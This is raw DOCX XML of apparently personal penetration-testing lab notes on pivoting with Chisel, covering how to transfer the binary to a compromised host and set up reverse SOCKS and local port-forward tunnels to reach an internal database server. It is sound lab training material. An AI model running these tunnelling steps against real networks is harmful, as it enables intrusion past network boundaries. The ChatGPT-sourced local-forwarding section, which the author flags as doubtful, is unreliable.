        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId224">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">similar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId225">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">messages</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where it appear when binaries compiled with Go versions 1.20 and later are run on operating systems that don't have a compatible version of glibc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Chisel Github page, we find an "official" compiled binary, also version 1.8.1, is compiled with</w:t>
      </w:r>
      <w:hyperlink r:id="rId226">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId227">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Go version 1.19</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Version 1.19 is one version of Go lower than the version that seems to have introduced this glibc incompatibility. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With that in mind, we can try using the Go 1.19-compiled Chisel 1.8.1 binary for Linux on amd64 processors</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is available on the main Chisel Github.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A5F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can first download the gzipped binary from Github using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can unpack that using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then host on python to send it back over to CONFLUENCE01</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip chisel_1.8.1_linux_amd64.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A64">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then try to run the Chisel client again on CONFLUENCE01 geting chisel on it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">This time, different kind of traffic is logged in our Tcpdump session.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="6832600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="169" name="image168.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image168.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId228"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="696"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo tcpdump -nvvvXi tun0 tcp port 8080</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The traffic that Tcpdump has logged indicates that the Chisel client has created an HTTP WebSocket connection with the server running on out Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On top of this, our Chisel server has logged an inbound connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A6F">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="275" name="image256.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image256.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</w:t>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t xml:space="preserve">Now, we can check the status of our SOCKS proxy with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="241" name="image243.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image243.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</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t xml:space="preserve">Go back to the Original "Using Chisel" section to see how to use Chisel with SSH </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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ba7s5dvitpqj" w:id="91"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Local Port forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT so use it with a grain of salt. I would recommend you look at this simple guide below instead, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId229">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</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A7D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario for Local Port Forwarding with Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali attacker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192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised pivot machine (CONFLUENCE01)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192.168.50.63</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target inside internal network (PGDATABASE01)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10.4.50.215</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reachable only from CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">has outbound HTTP (port 8080) access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali is listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal: Forward a port from PGDATABASE01 to Kali via CONFLUENCE01 using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local port forward</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that Kali can access PGDATABASE01 directly on a local port.</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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding Explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A85">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike reverse port forwarding, where the SOCKS proxy is opened on the attacker side, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local port forwarding opens a port on the victim/pivot side</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CONFLUENCE01), and forwards it through the HTTP tunnel to a target service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali can’t normally reach directly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, like PGDATABASE01.</w:t>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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Setup for Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A88">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Start Chisel server on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="502"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens an HTTP listener on port 8080 on Kali.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Prepare Chisel client on CONFLUENCE01</w:t>
      </w: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You want to forward PGDATABASE01's SSH (10.4.50.215:22) to Kali as localhost:2222, so you can SSH into PGDATABASE01 by just hitting 127.0.0.1:2222 on Kali.</w:t>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t xml:space="preserve">Here’s the Chisel client command to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client http://192.168.118.4:8080 2222:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 connects to the Kali Chisel server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It forwards Kali's 127.0.0.1:2222 to 10.4.50.215:22 from CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1255"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You'd run this on CONFLUENCE, through a web shell for example</w:t>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t xml:space="preserve">You could redirect output just like in the reverse case to confirm success if needed.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
